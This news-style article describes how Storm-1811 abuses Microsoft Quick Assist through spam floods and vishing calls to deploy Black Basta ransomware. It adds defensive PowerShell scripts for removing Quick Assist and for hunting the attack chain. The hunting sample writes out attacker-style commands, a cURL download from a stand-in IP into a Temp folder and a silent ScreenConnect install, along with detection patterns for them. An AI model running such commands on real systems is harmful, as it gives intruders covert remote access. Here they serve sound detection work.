Cybercrime Gang Abuses Microsoft Quick Assist to Deploy Black Basta Ransomware
May 17, 2024
Microsoft Threat Intelligence and other security researchers have reported that a cybercrime group tracked as Storm-1811 is abusing Microsoft's Quick Assist remote-help application in social engineering attacks that end with the deployment of Black Basta ransomware. The activity has been observed since mid-April 2024 and has hit both businesses and individual users.
Attack Mechanism Revealed
Storm-1811 combines email bombing with voice phishing (vishing). The target's inbox is first flooded with subscription and spam email; the attackers then phone the victim posing as IT support or a help desk, offering to fix the "spam problem", and walk them through granting remote access with Quick Assist. Specifically, the victim is told to press CTRL+Windows+Q to launch Quick Assist and to enter the security code the caller reads out. Quick Assist is a legitimate Windows tool, so nothing is exploited: once the victim enters the code, approves the screen share and then approves the attacker's request for control, the attacker has interactive control of the desktop with the victim's own privileges.
With control of the session, the attacker types commands as though they were the victim. Microsoft observed scripted cURL commands being used to download batch files and ZIP archives that install remote monitoring and management tools (ScreenConnect and NetSupport Manager) and malware (Qakbot, also known as QBot, and Cobalt Strike). The RMM tools give the attacker persistent access that survives the Quick Assist session; the rest of the tooling is used for domain enumeration and lateral movement across the victim's network before Black Basta is deployed.
Real-World Cases
1. A Financial Services Company
A financial services company that uses a Managed Detection and Response (MDR) service fell victim to an attack. The attackers gained remote access by bombarding an administrator with spam email and phishing calls, then deployed Black Basta ransomware and encrypted critical financial data. Although the company moved immediately to recover the data, the incident resulted in losses amounting to millions of dollars.
2. A Healthcare Facility
The IT department of a healthcare facility received a call from someone posing as technical support, asking to resolve system issues via Quick Assist. Trusting the caller, the IT team granted access, allowing the attackers to take control of the facility's systems and encrypt patient records and medical data. The attack not only caused millions of dollars in financial losses but also severely disrupted patient care.
Microsoft’s Response
Microsoft has acknowledged that Quick Assist is being abused and says it is investigating these attacks. It plans to harden Quick Assist by adding warning messages that make tech-support scams easier to recognize and by improving transparency and trust between the helper and the person being helped. In the meantime, Microsoft advises users and organizations to block or uninstall Quick Assist and any other remote management tools that are not in use, reducing the attack surface for this kind of social engineering.
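The following script is an added example for applying that advice on a single Windows 10/11 endpoint; it is not Microsoft's own tooling. It audits whether Quick Assist is present as a Feature on Demand or as a Store package and removes both, including the provisioned copy that would otherwise reappear in new user profiles. The capability and package names are the ones Quick Assist ships under; the function names `Get-QuickAssistState` and `Remove-QuickAssist` are this example's own.

```powershell
#Requires -RunAsAdministrator
# Added example (not Microsoft's tooling): audit and remove Quick Assist on an
# endpoint where it is not used. Run from an elevated PowerShell session.

$FodName  = 'App.Support.QuickAssist~~~~0.0.1.0'   # Windows 10 Feature on Demand
$StoreApp = 'MicrosoftCorporationII.QuickAssist'    # Windows 11 / Microsoft Store package

function Get-QuickAssistState {
    [CmdletBinding()]
    param()
    # Either install form can be present; check both.
    $fod  = Get-WindowsCapability -Online -Name $FodName -ErrorAction SilentlyContinue
    $appx = Get-AppxPackage -AllUsers -Name $StoreApp -ErrorAction SilentlyContinue
    [pscustomobject]@{
        FodInstalled   = ($null -ne $fod -and $fod.State -eq 'Installed')
        StoreInstalled = ($null -ne $appx)
        StoreVersion   = if ($appx) { ($appx | Select-Object -First 1).Version } else { $null }
    }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $state = Get-QuickAssistState
    if ($state.FodInstalled -and $PSCmdlet.ShouldProcess($FodName, 'Remove Windows capability')) {
        Remove-WindowsCapability -Online -Name $FodName | Out-Null
    }
    if ($state.StoreInstalled -and $PSCmdlet.ShouldProcess($StoreApp, 'Remove Appx package for all users')) {
        Get-AppxPackage -AllUsers -Name $StoreApp | Remove-AppxPackage -AllUsers
        # Also drop the provisioned package so new user profiles do not get it back.
        Get-AppxProvisionedPackage -Online |
            Where-Object { $_.DisplayName -eq $StoreApp } |
            Remove-AppxProvisionedPackage -Online | Out-Null
    }
    # Return the post-removal state so the caller can verify.
    Get-QuickAssistState
}

# Usage:
#   Get-QuickAssistState        # audit only
#   Remove-QuickAssist -WhatIf  # preview what would be removed
#   Remove-QuickAssist          # remove and return the resulting state
```

Removing the binary is a blunt control; where a help desk legitimately relies on Quick Assist, application control (AppLocker or WDAC) that limits quickassist.exe to the support team's accounts is the alternative, and the same policy should cover unsanctioned RMM installers such as ScreenConnect and NetSupport Manager that the attacker tries to drop afterwards.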
Microsoft has also published indicators of compromise and threat-hunting queries to help customers find this activity in their own telemetry. The queries look, for example, for suspicious cURL activity (a built-in Windows binary downloading payloads into user-writable locations), for Quick Assist usage itself, and for the use of proxy and tunnelling tools, so that the intrusion can be caught while it is still hands-on-keyboard and before ransomware is deployed.
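As an added example of what such a hunt looks like in practice, and not one of Microsoft's published queries, the script below runs over a constructed sample of process-creation events (in the shape of Windows 4688 or Sysmon Event ID 1 records) and scores cURL downloads by the chain described above: a download to a user-writable path, preceded on the same host by a Quick Assist launch, and followed by an RMM installer. The sample events, the field names, the function name `Find-QuickAssistDownloadChain`, the score weights and the RMM name list are all this example's assumptions.

```powershell
# Added example (not a Microsoft hunting query): flag cURL downloads that fit the
# Quick Assist -> cURL -> RMM-install pattern. Events are a constructed sample.

$sample = @(
    [pscustomobject]@{ TimeCreated='2024-05-10 13:02:11'; Host='WS-0142'; User='CORP\jdoe';  Image='C:\Windows\System32\quickassist.exe'; CommandLine='quickassist.exe' }
    [pscustomobject]@{ TimeCreated='2024-05-10 13:09:48'; Host='WS-0142'; User='CORP\jdoe';  Image='C:\Windows\System32\cmd.exe';         CommandLine='cmd.exe' }
    [pscustomobject]@{ TimeCreated='2024-05-10 13:10:05'; Host='WS-0142'; User='CORP\jdoe';  Image='C:\Windows\System32\curl.exe';        CommandLine='curl -s -o C:\Users\jdoe\AppData\Local\Temp\update.zip http://203.0.113.10/update.zip' }
    [pscustomobject]@{ TimeCreated='2024-05-10 13:12:30'; Host='WS-0142'; User='CORP\jdoe';  Image='C:\Windows\System32\msiexec.exe';     CommandLine='msiexec /i C:\Users\jdoe\AppData\Local\Temp\ScreenConnect.ClientSetup.msi /qn' }
    # Benign: a build host pulling a tool into a non-user path, no Quick Assist, no RMM.
    [pscustomobject]@{ TimeCreated='2024-05-10 13:15:00'; Host='WS-0200'; User='CORP\build'; Image='C:\Windows\System32\curl.exe';        CommandLine='curl -L -o C:\dev\tools\kubectl.exe https://dl.k8s.io/release/v1.30.0/bin/windows/amd64/kubectl.exe' }
    # Benign: no output switch, so nothing is written to disk.
    [pscustomobject]@{ TimeCreated='2024-05-10 13:16:00'; Host='WS-0200'; User='CORP\build'; Image='C:\Windows\System32\curl.exe';        CommandLine='curl https://api.example.com/health' }
)

function Find-QuickAssistDownloadChain {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 60     # how far back to look for a Quick Assist launch
    )
    # Paths a standard user can write to and attackers typically stage into.
    $userWritable = '\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|ProgramData|Windows\\Temp|Users\\Public)\\'
    # RMM tools named in the Storm-1811 reporting (client32.exe is NetSupport's client binary).
    $rmmNames     = 'screenconnect|netsupport|client32\.exe'

    $qaStarts = $Events | Where-Object { $_.Image -match '\\quickassist\.exe$' }
    # -match is case-insensitive, so -o and -O are both caught here.
    $curlDownloads = $Events | Where-Object {
        $_.Image -match '\\curl\.exe$' -and
        $_.CommandLine -match '(^|\s)(-o|--output|--remote-name)(\s|$)'
    }

    foreach ($dl in $curlDownloads) {
        $t = [datetime]$dl.TimeCreated
        $priorQa = $qaStarts | Where-Object {
            $_.Host -eq $dl.Host -and
            ([datetime]$_.TimeCreated) -le $t -and
            ($t - [datetime]$_.TimeCreated).TotalMinutes -le $WindowMinutes
        }
        $rmmAfter = $Events | Where-Object {
            $_.Host -eq $dl.Host -and
            ([datetime]$_.TimeCreated) -ge $t -and
            ($_.Image + ' ' + $_.CommandLine) -match $rmmNames
        }
        $score = 0
        if ($dl.CommandLine -match $userWritable) { $score += 1 }
        if ($priorQa) { $score += 2 }
        if ($rmmAfter) { $score += 2 }
        [pscustomobject]@{
            Host              = $dl.Host
            User              = $dl.User
            Time              = $dl.TimeCreated
            CommandLine       = $dl.CommandLine
            QuickAssistBefore = [bool]$priorQa
            RmmAfter          = [bool]$rmmAfter
            Score             = $score
        }
    }
}

# Only the WS-0142 download scores 5; the kubectl pull scores 0 and is dropped.
Find-QuickAssistDownloadChain -Events $sample | Where-Object { $_.Score -ge 3 } | Format-Table -AutoSize
```

In a real environment the `$sample` array would be replaced by `Get-WinEvent` output or an EDR export, and the Quick Assist match should also cover the Store install path under `C:\Program Files\WindowsApps\`, which the trailing `\quickassist.exe$` pattern already does. The point of the correlation is that none of the three signals is conclusive on its own: cURL is a legitimate Windows binary, Quick Assist is a legitimate support tool, and RMM installers are common, but the three in sequence on one host within an hour is the Storm-1811 chain.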
Preventive Measures
To defend against this kind of social engineering, security teams recommend that organizations train staff to treat unsolicited "IT support" calls with suspicion, and to verify any request for remote access through a known internal channel (for example, hanging up and calling the published help desk number) before launching Quick Assist or entering a code. A sudden flood of subscription spam followed by a helpful phone call should itself be recognized as the start of an attack. Organizations should also review which remote management tools are sanctioned, restrict the rest with application control, and make sure that unexpected RMM installations and cURL downloads generate alerts rather than going unnoticed.
The recent attacks by the Storm-1811 gang leveraging Quick Assist highlight the critical need for robust cybersecurity measures and heightened awareness. Both enterprises and individual users must work together to create a safer digital environment.